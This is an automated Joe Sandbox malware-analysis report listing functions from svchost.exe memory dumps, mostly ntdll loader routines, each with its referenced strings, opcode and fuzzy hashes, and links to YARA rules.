                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                        • API String ID: 0-3815128232
                                                                                        • Opcode ID: 79bef607b50651a88ebc5860edb1b89eecbbd7f8eec870db8b94d79d920ca822
                                                                                        • Instruction ID: d3a0c7c8a52ef383e9567c58493275a11f3379d6f080950b97ac0fcdb862f4af
                                                                                        • Opcode Fuzzy Hash: 79bef607b50651a88ebc5860edb1b89eecbbd7f8eec870db8b94d79d920ca822
                                                                                        • Instruction Fuzzy Hash: C15134351046548EE374DAAEC844772B7E1DF4534CF1888CAE4D2CB685D275E84BDB21
                                                                                        Function 0386C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 038A82DE
                                                                                        • Failed to reallocate the system dirs string !, xrefs: 038A82D7
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 038A82E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-1783798831
                                                                                        • Opcode ID: 2212191fba16c1a1c3000560023ec88427e2fe08eb666f6eb5c54bb6fb54e9f0
                                                                                        • Instruction ID: 56f32d61cc0dce209f32c743f3cc941e9beb3ee93a8f42756b8fa1af5aa9bd72
                                                                                        • Opcode Fuzzy Hash: 2212191fba16c1a1c3000560023ec88427e2fe08eb666f6eb5c54bb6fb54e9f0
                                                                                        • Instruction Fuzzy Hash: 9041D3B5549704ABCB20FBACD844B5B77E8EB44650F0449AAF988DB254EB74D810CB92
                                                                                        Function 038616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 038A1B4A
                                                                                        • LdrpAllocateTls, xrefs: 038A1B40
                                                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 038A1B39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                        • API String ID: 0-4274184382
                                                                                        • Opcode ID: 9008a81027206fbc1bc024e552949f65fb275a6649e2e84e521b1ef6eedf6b26
                                                                                        • Instruction ID: f284fe81ad36f11da3b4ef3ec5cd75637463ae1c6de73bfad4d85124ac76d175
                                                                                        • Opcode Fuzzy Hash: 9008a81027206fbc1bc024e552949f65fb275a6649e2e84e521b1ef6eedf6b26
                                                                                        • Instruction Fuzzy Hash: EE4168B9A00A08AFDB15DFE8C845BAEFBF5FF49714F148199E405EB255D774A800CB90
                                                                                        Function 038EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • @, xrefs: 038EC1F1
                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 038EC1C5
                                                                                        • PreferredUILanguages, xrefs: 038EC212
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                        • API String ID: 0-2968386058
                                                                                        • Opcode ID: 915143f233f72c364882597d4938db3b1afcc91e2ed9487ed61a7e6d3b8eebb5
                                                                                        • Instruction ID: ab3b941811eed4007a2a3b55c844c779ab68e1c44d87d69921d2c224a31cd37b
                                                                                        • Opcode Fuzzy Hash: 915143f233f72c364882597d4938db3b1afcc91e2ed9487ed61a7e6d3b8eebb5
                                                                                        • Instruction Fuzzy Hash: EC418076E00209EFDF11DAE8C881FEEBBBDAB05704F1440AAE915F7290D7749A44CB91
                                                                                        Function 038C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                        • API String ID: 0-1373925480
                                                                                        • Opcode ID: 14cb81a6fd1b53581f2436cce73ba082136523ff2bb3ae48de0c803ec77b9ab7
                                                                                        • Instruction ID: 45b8a968ef6840c617b8e779d57ab69def026b59df24218279c6adad6e342058
                                                                                        • Opcode Fuzzy Hash: 14cb81a6fd1b53581f2436cce73ba082136523ff2bb3ae48de0c803ec77b9ab7
                                                                                        • Instruction Fuzzy Hash: 3641D0759103888BEB22DBEAC850BADB7B8EF55344F1804DED941EF781DA75C941CB11
                                                                                        Function 038B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 038B4888
                                                                                        • LdrpCheckRedirection, xrefs: 038B488F
                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 038B4899
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                        • API String ID: 0-3154609507
                                                                                        • Opcode ID: 52c1e1714b64694b33e52ea91e0553581e96f91e5b70664caedbff34aae44054
                                                                                        • Instruction ID: 4409735566f96cdbbc0c091f13fdc2c6d8bbf968a95b97a8c1240470e5d97983
                                                                                        • Opcode Fuzzy Hash: 52c1e1714b64694b33e52ea91e0553581e96f91e5b70664caedbff34aae44054
                                                                                        • Instruction Fuzzy Hash: 2A41D632A047569FCB21DEAAD842AA6B7F8AF49650F0905D9FC58DB353D731E800CB91
                                                                                        Function 038633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • SXS: %s() passed the empty activation context data, xrefs: 038A29FE
                                                                                        • RtlCreateActivationContext, xrefs: 038A29F9
                                                                                        • Actx , xrefs: 038633AC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                        • API String ID: 0-859632880
                                                                                        • Opcode ID: a0c396724d976abdd7d06099f75ed0dbcb23bbf54f2260fb43b7311b58e9ace1
                                                                                        • Instruction ID: b1c0e2ab712122ac0b7498834d98fbab40289ac221d53eb43c60685334179a20
                                                                                        • Opcode Fuzzy Hash: a0c396724d976abdd7d06099f75ed0dbcb23bbf54f2260fb43b7311b58e9ace1
                                                                                        • Instruction Fuzzy Hash: CA3126362007059FEB26DED8C880F96B7A4BB44710F1944A9ED05DF291C7B0E941C790
                                                                                        Function 03861607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 038A1A51
                                                                                        • LdrpInitializeTls, xrefs: 038A1A47
                                                                                        • DLL "%wZ" has TLS information at %p, xrefs: 038A1A40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                        • API String ID: 0-931879808
                                                                                        • Opcode ID: d8826f2be15dffa99ab799d88bc542d9356f18bb05cc99a6c5a4115ffb56b423
                                                                                        • Instruction ID: 24f74c64442d2b9fb59c2f854af507fb8dd2cf349bd210a34a55e16a1bd340d2
                                                                                        • Opcode Fuzzy Hash: d8826f2be15dffa99ab799d88bc542d9356f18bb05cc99a6c5a4115ffb56b423
                                                                                        • Instruction Fuzzy Hash: 14312836A04704ABEB20DBD8CC8DF7AB7ACEB52754F0500D9E505EB185E7B0AD048791
                                                                                        Function 03871270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0387127B
                                                                                        • BuildLabEx, xrefs: 0387130F
                                                                                        • @, xrefs: 038712A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                        • API String ID: 0-3051831665
                                                                                        • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                        • Instruction ID: 4635ca6531ac7e08b8900ba23c51f3a2025f30fc1f2abe20ebcc425b6ea0a284
                                                                                        • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                        • Instruction Fuzzy Hash: 6231AF7690061CABDB11EFE9CC48EAEBBBEEB85710F0044A5E914EB560D734DA05CB61
                                                                                        Function 038B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 038B20F3
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 038B2104
                                                                                        • LdrpInitializationFailure, xrefs: 038B20FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-2986994758
                                                                                        • Opcode ID: fe5e8c9292fe8e60b91f3c5554723a1a0d8a52f79b48a25dca693cb524d99ce5
                                                                                        • Instruction ID: c0e0ff6b640596ca071a6e31100b739d2060ad1d58aa65ab677bcf461b06411c
                                                                                        • Opcode Fuzzy Hash: fe5e8c9292fe8e60b91f3c5554723a1a0d8a52f79b48a25dca693cb524d99ce5
                                                                                        • Instruction Fuzzy Hash: 75F0FF74640708ABEA20E68C8C42F9A776CEB40A04F1408D4F600EB386D2A4B9108A91
                                                                                        Function 038403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: #%u
                                                                                        • API String ID: 48624451-232158463
                                                                                        • Opcode ID: d4e27bf87f0dc59c4d1155fa447bb575e49033d29f2f344769eacb4db14f395a
                                                                                        • Instruction ID: 8314ba0e6bb7f8b0a8d37bb8876a8c3b8fb16f967e1b51cb8753c3514fbc80f7
                                                                                        • Opcode Fuzzy Hash: d4e27bf87f0dc59c4d1155fa447bb575e49033d29f2f344769eacb4db14f395a
                                                                                        • Instruction Fuzzy Hash: 09713CB5A0024A9FDB05DFD9D990BAEB7F8EF08704F1940A5E905EB251E734EE01CB61
                                                                                        Function 038D705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: kLsE
                                                                                        • API String ID: 3446177414-3058123920
                                                                                        • Opcode ID: 796a15376236dae0e5da734a92adbc46b34f58103cd26a33acb4c95b070c163d
                                                                                        • Instruction ID: 1a95bbd630c66898933d9992ca6023a15d7f92e631721005091e8b30522b6f12
                                                                                        • Opcode Fuzzy Hash: 796a15376236dae0e5da734a92adbc46b34f58103cd26a33acb4c95b070c163d
                                                                                        • Instruction Fuzzy Hash: AE418936509B504AE731FFE9E884B697B94AB51724F180298FC60CF1C9CBB44885C792
                                                                                        Function 038452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@
                                                                                        • API String ID: 0-149943524
                                                                                        • Opcode ID: da531006d767e694d1c114e6b32df3299d9b31bf96c5e4403ad8826cf7f631ac
                                                                                        • Instruction ID: 8882e674f703a811e7dd5a92fb50e3291589e51cf8f4455b793f54fe480b272f
                                                                                        • Opcode Fuzzy Hash: da531006d767e694d1c114e6b32df3299d9b31bf96c5e4403ad8826cf7f631ac
                                                                                        • Instruction Fuzzy Hash: D332BB745083198BDB24CF98C480B3EB7E1EF86754F1849AEF885DBA90E734D944CB52
                                                                                        Function 03832FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @4Cw@4Cw$PATH
                                                                                        • API String ID: 0-1794901795
                                                                                        • Opcode ID: dc3558bbf8a71a7c1e360a92358fc3239efd924ba7907885293a0f8d1f0fe6ce
                                                                                        • Instruction ID: 7e236ce8bd873732c6f4ede0ea86b6e24725879b7f6df0e9f04dda01ffe3dc9f
                                                                                        • Opcode Fuzzy Hash: dc3558bbf8a71a7c1e360a92358fc3239efd924ba7907885293a0f8d1f0fe6ce
                                                                                        • Instruction Fuzzy Hash: 4EF1BF79D00618DBCB25DFE8D880ABEB7B1FF89700F4980A9E440EB354D7B49941CB91
                                                                                        Function 038FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `$`
                                                                                        • API String ID: 0-197956300
                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                        • Instruction ID: 2d59ca1ad93ee3e0910cc56d7a4bbaf1edec67c4855c9e7b8cfb1a9e05eca2f2
                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                        • Instruction Fuzzy Hash: AEC1B0312043459FD728CFA8C841B6BFBE5AF84328F184AADF699CA290D779D505CF52
                                                                                        Function 03830CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • ResIdCount less than 2., xrefs: 0388EEC9
                                                                                        • Failed to retrieve service checksum., xrefs: 0388EE56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                        • API String ID: 0-863616075
                                                                                        • Opcode ID: 5993de1333a4350e1f068a5508b96d847c5afaa8e58bcbe8f89e53432afb7dc4
                                                                                        • Instruction ID: c9c7ae3b2302dd6556f9dc3f657bfac4b1ad992d59b14f556b4b2a9074a5efbe
                                                                                        • Opcode Fuzzy Hash: 5993de1333a4350e1f068a5508b96d847c5afaa8e58bcbe8f89e53432afb7dc4
                                                                                        • Instruction Fuzzy Hash: 95E1F3B59087849FE364CF55C480BABBBE4BB88314F408A6EE599CB340DB709549CF96
                                                                                        Function 00402980 Relevance: 2.7, Strings: 2, Instructions: 237COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Zzm)@$gfff
                                                                                        • API String ID: 0-2134773077
                                                                                        • Opcode ID: 6e8ca83001b32d009f6dba300b2ec6bd86ceffc8664efd6787db01a0f15b9e39
                                                                                        • Instruction ID: 2dbbbd576cade97e4c4a312ca10e23aa04993d7c7f3e33c32c406751064cf059
                                                                                        • Opcode Fuzzy Hash: 6e8ca83001b32d009f6dba300b2ec6bd86ceffc8664efd6787db01a0f15b9e39
                                                                                        • Instruction Fuzzy Hash: 8271C271B0040A47DB1CDD5DCA956BEB3A6E794314F18817FD90AEB3C1EAB8AE418684
                                                                                        Function 038AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Legacy$UEFI
                                                                                        • API String ID: 2994545307-634100481
                                                                                        • Opcode ID: 350405288fc17bafe841a8a74a56f512f32f10d4e6a27801d6a1cb492089a8f2
                                                                                        • Instruction ID: 1494424f75b0ee79e6077fea37eba6b324b4c7a0c0012080f2bdd7448025a0ac
                                                                                        • Opcode Fuzzy Hash: 350405288fc17bafe841a8a74a56f512f32f10d4e6a27801d6a1cb492089a8f2
                                                                                        • Instruction Fuzzy Hash: 7E612A71E00B189FEB24DFECC980BAEBBB9FB44704F1444A9E659EB251D731A940CB51
                                                                                        Function 0384F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$$
                                                                                        • API String ID: 0-233714265
                                                                                        • Opcode ID: 3dd9d8787c70f1f9b915c41110b207c71cd83aaa0b85feef09de99fbe00f944a
                                                                                        • Instruction ID: 69277a3cbe569c86f9e7b693abee1800f4404f2cd661c1c48386a31a762caf41
                                                                                        • Opcode Fuzzy Hash: 3dd9d8787c70f1f9b915c41110b207c71cd83aaa0b85feef09de99fbe00f944a
                                                                                        • Instruction Fuzzy Hash: A2618975A0074EDFDB20DFE8C580BADB7B1BB44704F1840ADD615AFA80DB74A945CB91
                                                                                        Function 0383A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0383A2FB
                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0383A309
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                        • API String ID: 0-2876891731
                                                                                        • Opcode ID: a90906843236830fac01592007f416709af6b63a54920cb65e924a83fcd4ba45
                                                                                        • Instruction ID: f58a7da913ced0b53f3222e12ead07d42e8552baa03ea3fd63c91ab1a1154fc0
                                                                                        • Opcode Fuzzy Hash: a90906843236830fac01592007f416709af6b63a54920cb65e924a83fcd4ba45
                                                                                        • Instruction Fuzzy Hash: 34419D35A04649DBDB15CFA9C840B69B7F4FF86704F1844E6EC44DB391E679D900CB92
                                                                                        Function 0386329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .Local\$@
                                                                                        • API String ID: 0-380025441
                                                                                        • Opcode ID: ad63a33d2748cb377513435df05dac07908b9d970b8ee19bdf4f4f71ea2e0dab
                                                                                        • Instruction ID: ad91328e7b9cc7fbe526a92f0442a0746b91124e58c075facfeea6e9b808123f
                                                                                        • Opcode Fuzzy Hash: ad63a33d2748cb377513435df05dac07908b9d970b8ee19bdf4f4f71ea2e0dab
                                                                                        • Instruction Fuzzy Hash: 9931A17A5087089FC321DF68D980A5BBBE8EBC5654F4809AEF595C7260DA70DD04CB93
                                                                                        Function 0383C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: MUI
                                                                                        • API String ID: 0-1339004836
                                                                                        • Opcode ID: f9c43cf8a3e378db077bf83529d27d1a195e8d1868ff72013323bc5a4d93f57a
                                                                                        • Instruction ID: 4d3de6d75c5cb163c21434795bac5585ba81708245d893d4ba7a36c5175babc3
                                                                                        • Opcode Fuzzy Hash: f9c43cf8a3e378db077bf83529d27d1a195e8d1868ff72013323bc5a4d93f57a
                                                                                        • Instruction Fuzzy Hash: 38823975E002189BDB24CFE9C880BEDF7B5BF4A714F1881A9E859EB350D770A945CB90
                                                                                        Function 03882F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: P`1wRb1w
                                                                                        • API String ID: 0-487437271
                                                                                        • Opcode ID: 20e8788bda6498bf5b4805cc8a093840838c68544368ff350fb6a0c55d6e1a56
                                                                                        • Instruction ID: cdbd0b216a002babcaccfd5eefd2618ccbcb99292b4fb8e0efb041789f310702
                                                                                        • Opcode Fuzzy Hash: 20e8788bda6498bf5b4805cc8a093840838c68544368ff350fb6a0c55d6e1a56
                                                                                        • Instruction Fuzzy Hash: 0742C27DD04259AADF29FFE8D8446BDFBB5AF04B14F1880DAE451EB280D7B48A41CB50
                                                                                        Function 0385FB80 Relevance: 1.8, Strings: 1, Instructions: 559COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ICwICw@4Cw@4Cw
                                                                                        • API String ID: 0-911715774
                                                                                        • Opcode ID: 9c31742a2e71d6d0aa0cab71d0f64eb1a9358925147c02c863d72ed465e82f61
                                                                                        • Instruction ID: c917796972f24de1d9d801d9efc5bd3eace19343c09b7a94145d9e9e0580f8a6
                                                                                        • Opcode Fuzzy Hash: 9c31742a2e71d6d0aa0cab71d0f64eb1a9358925147c02c863d72ed465e82f61
                                                                                        • Instruction Fuzzy Hash: 28229FB5904609AFEB10DFE8C880BAEB7B5FF44310F1885E9E914DB245E734DA45CB91
                                                                                        Function 03837370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 37f6005300e440ff76106b56a7911663b72d6b724d5779d8cff2aa2cf5d54b46
                                                                                        • Instruction ID: d198f4a254f28ee961ea63a92eed4db949d7343174e26e9554470e637b4c5567
                                                                                        • Opcode Fuzzy Hash: 37f6005300e440ff76106b56a7911663b72d6b724d5779d8cff2aa2cf5d54b46
                                                                                        • Instruction Fuzzy Hash: 0CA18EB5608346CFD724DFA8C480A2ABBE5BF89304F1449AEF585DB350E770E945CB92
                                                                                        Function 03852E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0
                                                                                        • API String ID: 0-4108050209
                                                                                        • Opcode ID: f333d206cbb58494764b2232ed549b94d5659e4b0a633c6e7593320f3707441d
                                                                                        • Instruction ID: eab9b56ac1649865f8dc1296307519a265d1b2d84f0be4cc09a54b7cc8c5cf54
                                                                                        • Opcode Fuzzy Hash: f333d206cbb58494764b2232ed549b94d5659e4b0a633c6e7593320f3707441d
                                                                                        • Instruction Fuzzy Hash: 45F1AE796087458FDB25CFA8C080B6ABBE5AF88654F0948EDFC89CB240DB74D945CB52
                                                                                        Function 0041669E Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
